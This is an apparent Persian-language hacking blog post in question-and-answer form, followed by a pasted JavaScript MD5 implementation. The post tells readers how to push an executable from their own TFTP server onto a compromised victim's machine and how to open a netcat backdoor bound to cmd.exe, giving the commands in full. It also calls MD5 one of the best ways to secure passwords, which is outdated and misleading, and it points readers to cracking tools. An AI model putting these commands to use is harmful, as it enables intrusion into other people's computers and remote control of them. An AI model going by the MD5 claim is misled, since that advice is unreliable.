Exploit چسیت؟

Exploit چسیت؟Exploit به قطعه کدی گفته می شود که هکر برای آسیب پذیری یا نفوذ به سیسنم آن را با زبان های مختلف(به خصوص سی و سی پلاس پلاس) می نویسد و میتوان آن را بعد از کامپایل و لینک کردن به یک فایل اجرایی تبدیل کرد و مورد استفاده قرار داد


چگونه می توان یک فایل را بعد از شل گرفتن بر روی سیستم قربانی قرار داد؟

برای این کار چندین Command وجود دارد که بیشترین Command مورد علاقه ی هکر ها TFTP است که شما باید برای این کار کامپیوتر خود را کامپیوتر سرور برای سرویس دهی قرار دهید تا بعد از شل گرفتن بتوانید فایلی را از کامپیوتر خود کپی کرده و در کامپیوتر فرد قربانی قرار دهید
مثال:
آدرس کامپیوتر شما xxx.xxx.xxx.xxx و فایلی به نام saied.exe در درایو سی شما قرار دارد و می خواهید آن را بر روی کامپیوتری که از آن شل گرفته اید و در درایو سی آن قرار دهید.ابتدا شما باید با یکی از برنامه های سرور TFTP پورت ۶۹ را بر روی کاپیوتر خود باز نمایید حال بعد از این کار این قطعه کد را بر روی سیستم قربانی بنویسید تا برنامه بر روی آن سوار شود
Tftp -i xxx.xxx.xxx.xxx get c:\saied.exe c:\saied.exe

Cpanel چیست؟

Cpanel یا Control Panel وظیفه ی کنترل اعمال داده شده به آن را بر عهده دارد و برای کنترل سیستم های لینوکس (سایت ها و سرورها)طراحی و ساخته شده است این بخش همانند Control Panel ویندوز است اما با تفاوت به اینکه این اعمال به صورت یکجا اعمال نشده و باید به صورت دقیق مورد پردازش قرار بگیرند(مانند نحوه ی کار با Command در لینوکس)

چگونه می توان به وسیله ی نت کد کامیپوتر دیگری را در اختیار گرفت؟
برای این کار شما باید کامپیوتر فرد مورد نظر خود را در حال Listinig قرار دهید و به آن اتصال پیدا کنید(همانند کار تروجان ها)
برای به حالت بردن کامپیوتر مورد نظر(قربانی) و اتصال به command کامپیوتر طرف باید این فرامین را در آن کامپیوتر اجرا نمایید
nc -l -p 1834 -t -e cmd.exe
که در این قطعه کد ما پورت 1384 را بر روی کامپیوتر قربانی باز کرده ایم(Backdoor) و حال باید به آن Connect کنیم .با استفاده از یکی از کدهای زیر
nc -v Ip address 1384
nc -vv ipaddress 1384
nc ipaddress 1384
بعد از اتصال شما به Command طرف اتصال پیدا کرده و می توانید فرامینی که در Command قابل اجرا بوده را اجرا نمایید

Md5 چیست؟
پاسخ:این یکی از بهترین روش ها برای کد گزاری کردن کلمه های عبور است که به دین وسیله فرد برنامه نویس یا یک مدیر امنیتی می تواند برای بالا بردن امنیت خود و دشوار
کردن شکستن کلمه های عبور به کار می رود. که شما می توانید به مراجعه به سایت های امنیتی و یا سرچ کردن در سایت های جستجوگر بهترین برنامه ی کرک کردن این کدها استفاده کنید.به عنوان مثال سایت پرشین بلاگ از این روش برای گد گزاری کلمات عبور می کند(این راز پیش خودمون بموند و مواظب باشید ادمین پرشین بلاگ نفهمد)

* md5.js
*
* A JavaScript implementation of the RSA Data Security, Inc. MD5
* Message-Digest Algorithm.
*
* Copyright (C) Paul Johnston 1999. Distributed under the LGPL.
*****************************************************************************/

/* to convert strings to a list of ascii values */
var sAscii = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
var sAscii = sAscii + "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

/* convert integer to hex string */
var sHex = "0123456789ABCDEF";
function hex(i)
{
h = "";
for(j = 0; j <= 3; j++)
{
h += sHex.charAt((i >> (j * 8 + 4)) & 0x0F) +
sHex.charAt((i >> (j * 8)) & 0x0F);
}
return h;
}

/* add, handling overflows correctly */
function add(x, y)
{
return ((x&0x7FFFFFFF) + (y&0x7FFFFFFF)) ^ (x&0x80000000) ^ (y&0x80000000);
}

/* MD5 rounds functions */
function R1(A, B, C, D, X, S, T)
{
q = add(add(A, (B & C) | (~B & D)), add(X, T));
return add((q << S) | ((q >> (32 - S)) & (Math.pow(2, S) - 1)), B);
}

function R2(A, B, C, D, X, S, T)
{
q = add(add(A, (B & D) | (C & ~D)), add(X, T));
return add((q << S) | ((q >> (32 - S)) & (Math.pow(2, S) - 1)), B);
}

function R3(A, B, C, D, X, S, T)
{
q = add(add(A, B ^ C ^ D), add(X, T));
return add((q << S) | ((q >> (32 - S)) & (Math.pow(2, S) - 1)), B);
}

function R4(A, B, C, D, X, S, T)
{
q = add(add(A, C ^ (B | ~D)), add(X, T));
return add((q << S) | ((q >> (32 - S)) & (Math.pow(2, S) - 1)), B);
}

/* main entry point */
function calcMD5(sInp) {

/* Calculate length in machine words, including padding */
wLen = (((sInp.length + 8) >> 6) + 1) << 4;
var X = new Array(wLen);

/* Convert string to array of words */
j = 4;
for (i = 0; (i * 4) < sInp.length; i++)
{
X[i] = 0;
for (j = 0; (j < 4) && ((j + i * 4) < sInp.length); j++)
{
X[i] += (sAscii.indexOf(sInp.charAt((i * 4) + j)) + 32) << (j * 8);
}
}

/* Append padding bits and length */
if (j == 4)
{
X[i++] = 0x80;
}
else
{
X[i - 1] += 0x80 << (j * 8);
}
for(; i < wLen; i++) { X[i] = 0; }
X[wLen - 2] = sInp.length * 8;

/* hard-coded initial values */
a = 0x67452301;
b = 0xefcdab89;
c = 0x98badcfe;
d = 0x10325476;

/* Process each 16-word block in turn */
for (i = 0; i < wLen; i += 16) {
aO = a;
bO = b;
cO = c;
dO = d;

a = R1(a, b, c, d, X[i+ 0], 7 , 0xd76aa478);
d = R1(d, a, b, c, X[i+ 1], 12, 0xe8c7b756);
c = R1(c, d, a, b, X[i+ 2], 17, 0x242070db);
b = R1(b, c, d, a, X[i+ 3], 22, 0xc1bdceee);
a = R1(a, b, c, d, X[i+ 4], 7 , 0xf57c0faf);
d = R1(d, a, b, c, X[i+ 5], 12, 0x4787c62a);
c = R1(c, d, a, b, X[i+ 6], 17, 0xa8304613);
b = R1(b, c, d, a, X[i+ 7], 22, 0xfd469501);
a = R1(a, b, c, d, X[i+ 8], 7 , 0x698098d8);
d = R1(d, a, b, c, X[i+ 9], 12, 0x8b44f7af);
c = R1(c, d, a, b, X[i+10], 17, 0xffff5bb1);
b = R1(b, c, d, a, X[i+11], 22, 0x895cd7be);
a = R1(a, b, c, d, X[i+12], 7 , 0x6b901122);
d = R1(d, a, b, c, X[i+13], 12, 0xfd987193);
c = R1(c, d, a, b, X[i+14], 17, 0xa679438e);
b = R1(b, c, d, a, X[i+15], 22, 0x49b40821);

a = R2(a, b, c, d, X[i+ 1], 5 , 0xf61e2562);
d = R2(d, a, b, c, X[i+ 6], 9 , 0xc040b340);
c = R2(c, d, a, b, X[i+11], 14, 0x265e5a51);
b = R2(b, c, d, a, X[i+ 0], 20, 0xe9b6c7aa);
a = R2(a, b, c, d, X[i+ 5], 5 , 0xd62f105d);
d = R2(d, a, b, c, X[i+10], 9 , 0x2441453);
c = R2(c, d, a, b, X[i+15], 14, 0xd8a1e681);
b = R2(b, c, d, a, X[i+ 4], 20, 0xe7d3fbc8);
a = R2(a, b, c, d, X[i+ 9], 5 , 0x21e1cde6);
d = R2(d, a, b, c, X[i+14], 9 , 0xc33707d6);
c = R2(c, d, a, b, X[i+ 3], 14, 0xf4d50d87);
b = R2(b, c, d, a, X[i+ 8], 20, 0x455a14ed);
a = R2(a, b, c, d, X[i+13], 5 , 0xa9e3e905);
d = R2(d, a, b, c, X[i+ 2], 9 , 0xfcefa3f8);
c = R2(c, d, a, b, X[i+ 7], 14, 0x676f02d9);
b = R2(b, c, d, a, X[i+12], 20, 0x8d2a4c8a);

a = R3(a, b, c, d, X[i+ 5], 4 , 0xfffa3942);
d = R3(d, a, b, c, X[i+ 8], 11, 0x8771f681);
c = R3(c, d, a, b, X[i+11], 16, 0x6d9d6122);
b = R3(b, c, d, a, X[i+14], 23, 0xfde5380c);
a = R3(a, b, c, d, X[i+ 1], 4 , 0xa4beea44);
d = R3(d, a, b, c, X[i+ 4], 11, 0x4bdecfa9);
c = R3(c, d, a, b, X[i+ 7], 16, 0xf6bb4b60);
b = R3(b, c, d, a, X[i+10], 23, 0xbebfbc70);
a = R3(a, b, c, d, X[i+13], 4 , 0x289b7ec6);
d = R3(d, a, b, c, X[i+ 0], 11, 0xeaa127fa);
c = R3(c, d, a, b, X[i+ 3], 16, 0xd4ef3085);
b = R3(b, c, d, a, X[i+ 6], 23, 0x4881d05);
a = R3(a, b, c, d, X[i+ 9], 4 , 0xd9d4d039);
d = R3(d, a, b, c, X[i+12], 11, 0xe6db99e5);
c = R3(c, d, a, b, X[i+15], 16, 0x1fa27cf8);
b = R3(b, c, d, a, X[i+ 2], 23, 0xc4ac5665);

a = R4(a, b, c, d, X[i+ 0], 6 , 0xf4292244);
d = R4(d, a, b, c, X[i+ 7], 10, 0x432aff97);
c = R4(c, d, a, b, X[i+14], 15, 0xab9423a7);
b = R4(b, c, d, a, X[i+ 5], 21, 0xfc93a039);
a = R4(a, b, c, d, X[i+12], 6 , 0x655b59c3);
d = R4(d, a, b, c, X[i+ 3], 10, 0x8f0ccc92);
c = R4(c, d, a, b, X[i+10], 15, 0xffeff47d);
b = R4(b, c, d, a, X[i+ 1], 21, 0x85845dd1);
a = R4(a, b, c, d, X[i+ 8], 6 , 0x6fa87e4f);
d = R4(d, a, b, c, X[i+15], 10, 0xfe2ce6e0);
c = R4(c, d, a, b, X[i+ 6], 15, 0xa3014314);
b = R4(b, c, d, a, X[i+13], 21, 0x4e0811a1);
a = R4(a, b, c, d, X[i+ 4], 6 , 0xf7537e82);
d = R4(d, a, b, c, X[i+11], 10, 0xbd3af235);
c = R4(c, d, a, b, X[i+ 2], 15, 0x2ad7d2bb);
b = R4(b, c, d, a, X[i+ 9], 21, 0xeb86d391);

a = add(a, aO);
b = add(b, bO);
c = add(c, cO);
d = add(d, dO);
}
return hex(a) + hex(b) + hex(c) + hex(d);
}

نوشته شده در تاریخ سه شنبه 6 اردیبهشت 1390    | توسط: بهنام مبارکی    | طبقه بندی: hack pc and site،     | نظرات()